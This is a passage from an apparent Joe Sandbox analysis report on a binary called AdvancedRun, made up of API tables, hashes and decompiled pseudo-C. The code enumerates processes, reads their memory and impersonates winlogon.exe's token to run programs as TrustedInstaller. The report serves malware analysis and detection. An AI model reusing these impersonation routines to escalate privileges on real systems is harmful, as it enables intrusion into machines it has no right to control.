                                                                  0x00402192
                                                                  0x004021a2
                                                                  0x004021a7
                                                                  0x004021a9
                                                                  0x004021ac
                                                                  0x004021cc
                                                                  0x004021d1
                                                                  0x004021d3
                                                                  0x004021db
                                                                  0x004021db
                                                                  0x004021e1
                                                                  0x004021e1
                                                                  0x004021e7
                                                                  0x004021e7
                                                                  0x00000000
                                                                  0x00402192
                                                                  0x004020fe
                                                                  0x00402103
                                                                  0x00402105
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402111
                                                                  0x00402114
                                                                  0x00000000
                                                                  0x00402114
                                                                  0x004020ad
                                                                  0x004020b4
                                                                  0x004020b9
                                                                  0x004020bc
                                                                  0x00000000
                                                                  0x004020c2
                                                                  0x004020c4
                                                                  0x004020ce
                                                                  0x004020d0
                                                                  0x004020d3
                                                                  0x004020d4
                                                                  0x004020d5
                                                                  0x004020e6
                                                                  0x004020e7
                                                                  0x004020d7
                                                                  0x004020d7
                                                                  0x004020dd
                                                                  0x004020de
                                                                  0x004020df
                                                                  0x004020df
                                                                  0x004020ec
                                                                  0x004020ef
                                                                  0x00000000
                                                                  0x004020ef
                                                                  0x00402008
                                                                  0x00402016
                                                                  0x0040201d
                                                                  0x0040202e
                                                                  0x00402035
                                                                  0x00402044
                                                                  0x00402049
                                                                  0x00402055
                                                                  0x00402064
                                                                  0x00402068
                                                                  0x0040206e
                                                                  0x0040208b
                                                                  0x00402070
                                                                  0x00402082
                                                                  0x00402088
                                                                  0x0040209e
                                                                  0x004020a1
                                                                  0x00402119
                                                                  0x00402119
                                                                  0x0040211b
                                                                  0x0040211e
                                                                  0x0040211e
                                                                  0x00402149
                                                                  0x00402151
                                                                  0x00402151
                                                                  0x00402157
                                                                  0x00402157
                                                                  0x004022cb
                                                                  0x004022d2
                                                                  0x004022d2

                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040201D
                                                                  • memset.MSVCRT ref: 00402035
                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                  • wcslen.MSVCRT ref: 00402050
                                                                  • wcslen.MSVCRT ref: 0040205F
                                                                  • wcslen.MSVCRT ref: 004020B4
                                                                  • _wtoi.MSVCRT ref: 004020D7
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                  • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                    • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                    • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                    • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                    • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                    • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                  • wcschr.MSVCRT ref: 00402259
                                                                  • CreateProcessW.KERNEL32 ref: 004022B8
                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                  • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                  • API String ID: 3201562063-2355939583
                                                                  • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                  • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                  • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                  • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 93%
                                                                  			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(Process32NextW(_v12,  &_v1136) != 0) {
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}






























                                                                  0x00409609
                                                                  0x0040960f
                                                                  0x00409619
                                                                  0x00409623
                                                                  0x0040962e
                                                                  0x00409633
                                                                  0x00409640
                                                                  0x0040964a
                                                                  0x00409782
                                                                  0x0040965a
                                                                  0x0040965f
                                                                  0x00409678
                                                                  0x0040967e
                                                                  0x00409681
                                                                  0x00409685
                                                                  0x00409688
                                                                  0x004096b2
                                                                  0x004096bf
                                                                  0x004096c6
                                                                  0x004096cb
                                                                  0x004096da
                                                                  0x004096e6
                                                                  0x0040973b
                                                                  0x00409747
                                                                  0x0040975f
                                                                  0x00409764
                                                                  0x0040976a
                                                                  0x00409770
                                                                  0x00409773
                                                                  0x0040977d
                                                                  0x00000000
                                                                  0x0040977d
                                                                  0x004096ee
                                                                  0x004096f5
                                                                  0x004096fc
                                                                  0x00409704
                                                                  0x0040970c
                                                                  0x0040971c
                                                                  0x0040971c
                                                                  0x00409704
                                                                  0x00409721
                                                                  0x00409728
                                                                  0x00409739
                                                                  0x00409739
                                                                  0x00000000
                                                                  0x00409728
                                                                  0x00409693
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004096a5
                                                                  0x004096a9
                                                                  0x004096ac
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004096ac
                                                                  0x004097a6

                                                                  APIs
                                                                    • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                  • memset.MSVCRT ref: 0040962E
                                                                  • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                  • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                  • memset.MSVCRT ref: 004096C6
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                  • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                  • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                  • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                  • API String ID: 239888749-1740548384
                                                                  • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                  • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                  • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                  • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 313 409921-409924 314 409926-40992c call 405436 313->314 315 409977 313->315 317 409931-409976 GetProcAddress * 5 314->317 317->315
                                                                  C-Code - Quality: 100%
                                                                  			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                  0x00409924
                                                                  0x0040992c
                                                                  0x00409937
                                                                  0x0040993f
                                                                  0x0040994a
                                                                  0x00409956
                                                                  0x00409962
                                                                  0x0040996e
                                                                  0x00409971
                                                                  0x00409973
                                                                  0x00000000
                                                                  0x00409976
                                                                  0x00409977

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                  • API String ID: 1529661771-70141382
                                                                  • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                  • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                  • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                  • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 318 40b2c6-40b2e0 call 40b4d4 GetModuleHandleA 321 40b301-40b304 318->321 322 40b2e2-40b2ed 318->322 324 40b32d-40b37c __set_app_type __p__fmode __p__commode call 4070dc 321->324 322->321 323 40b2ef-40b2f8 322->323 326 40b319-40b31d 323->326 327 40b2fa-40b2ff 323->327 331 40b38a-40b3e0 call 40b4c2 _initterm __wgetmainargs _initterm 324->331 332 40b37e-40b389 __setusermatherr 324->332 326->321 330 40b31f-40b321 326->330 327->321 329 40b306-40b30d 327->329 329->321 333 40b30f-40b317 329->333 334 40b327-40b32a 330->334 337 40b3f0-40b3f7 331->337 338 40b3e2-40b3eb 331->338 332->331 333->334 334->324 340 40b3f9-40b404 337->340 341 40b43e-40b442 337->341 339 40b4aa-40b4af call 40b50d 338->339 344 40b406-40b40a 340->344 345 40b40c-40b410 340->345 342 40b444-40b449 341->342 343 40b417-40b41d 341->343 342->341 349 40b425-40b436 GetStartupInfoW 343->349 350 40b41f-40b423 343->350 344->340 344->345 345->343 347 40b412-40b414 345->347 347->343 351 40b438-40b43c 349->351 352 40b44b-40b44d 349->352 350->347 350->349 353 40b44e-40b466 GetModuleHandleA call 408533 351->353 352->353 356 40b468-40b469 exit 353->356 357 40b46f-40b4a8 _cexit 353->357 356->357 357->339
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                  • String ID:
                                                                  • API String ID: 2827331108-0
                                                                  • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                  • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                  • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                  • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 80%
                                                                  			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				int _t43;
				int _t45;
				void* _t48;
				void* _t56;
				signed int _t57;
				long _t61;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
					if(_t43 == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
						_t69 = _t61;
						E004055D1(_t61,  &_v28);
					}
					_t45 = FindCloseChangeNotification(_a16); // executed
					E004055D1(_t45,  &_v564);
				}
				return _t69;
			}





























                                                                  0x00401ac9
                                                                  0x00401ad1
                                                                  0x00401ae1
                                                                  0x00401ae7
                                                                  0x00401ae9
                                                                  0x00401aec
                                                                  0x00401c1b
                                                                  0x00401af2
                                                                  0x00401af2
                                                                  0x00401af8
                                                                  0x00401b0c
                                                                  0x00401b12
                                                                  0x00401b1a
                                                                  0x00401bfd
                                                                  0x00401b20
                                                                  0x00401b26
                                                                  0x00401b2b
                                                                  0x00401b36
                                                                  0x00401b40
                                                                  0x00401b43
                                                                  0x00401b4a
                                                                  0x00401b54
                                                                  0x00401b55
                                                                  0x00401b56
                                                                  0x00401b57
                                                                  0x00401b58
                                                                  0x00401b63
                                                                  0x00401b68
                                                                  0x00401b69
                                                                  0x00401b77
                                                                  0x00401b7d
                                                                  0x00401b82
                                                                  0x00401b82
                                                                  0x00401b88
                                                                  0x00401b8b
                                                                  0x00401b8e
                                                                  0x00401b91
                                                                  0x00401b98
                                                                  0x00401b9b
                                                                  0x00401ba0
                                                                  0x00401ba5
                                                                  0x00401baa
                                                                  0x00401bac
                                                                  0x00401bac
                                                                  0x00401bb2
                                                                  0x00401bb2
                                                                  0x00401bbe
                                                                  0x00401bc4
                                                                  0x00401bc6
                                                                  0x00401bc8
                                                                  0x00401bc8
                                                                  0x00401bd7
                                                                  0x00401be6
                                                                  0x00401bee
                                                                  0x00401bf0
                                                                  0x00401bf0
                                                                  0x00401c02
                                                                  0x00401c0e
                                                                  0x00401c0e
                                                                  0x00401c23

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                  • ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                  • memset.MSVCRT ref: 00401B4A
                                                                  • ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                  • _snwprintf.MSVCRT ref: 00401B69
                                                                    • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                    • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                  • FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
                                                                  • String ID: %d %I64x
                                                                  • API String ID: 1126726007-2565891505
                                                                  • Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                  • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                  • Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                  • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 90%
                                                                  			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                  0x00401f04
                                                                  0x00401f20
                                                                  0x00401f27
                                                                  0x00401f38
                                                                  0x00401f3f
                                                                  0x00401f4e
                                                                  0x00401f54
                                                                  0x00401f5f
                                                                  0x00401f6e
                                                                  0x00401f72
                                                                  0x00401f77
                                                                  0x00401f78
                                                                  0x00401f91
                                                                  0x00401f7a
                                                                  0x00401f88
                                                                  0x00401f8e
                                                                  0x00401f8e
                                                                  0x00401fa6
                                                                  0x00401fa9
                                                                  0x00401fae
                                                                  0x00401fb0
                                                                  0x00401fb2
                                                                  0x00401fb9
                                                                  0x00401fc2
                                                                  0x00401fca
                                                                  0x00401fd2
                                                                  0x00401fd2
                                                                  0x00401fd7
                                                                  0x00401fd7
                                                                  0x00401fe3

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00401F27
                                                                  • memset.MSVCRT ref: 00401F3F
                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                  • wcslen.MSVCRT ref: 00401F5A
                                                                  • wcslen.MSVCRT ref: 00401F69
                                                                  • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                  • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                  • API String ID: 3867304300-2177360481
                                                                  • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                  • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                  • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                  • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

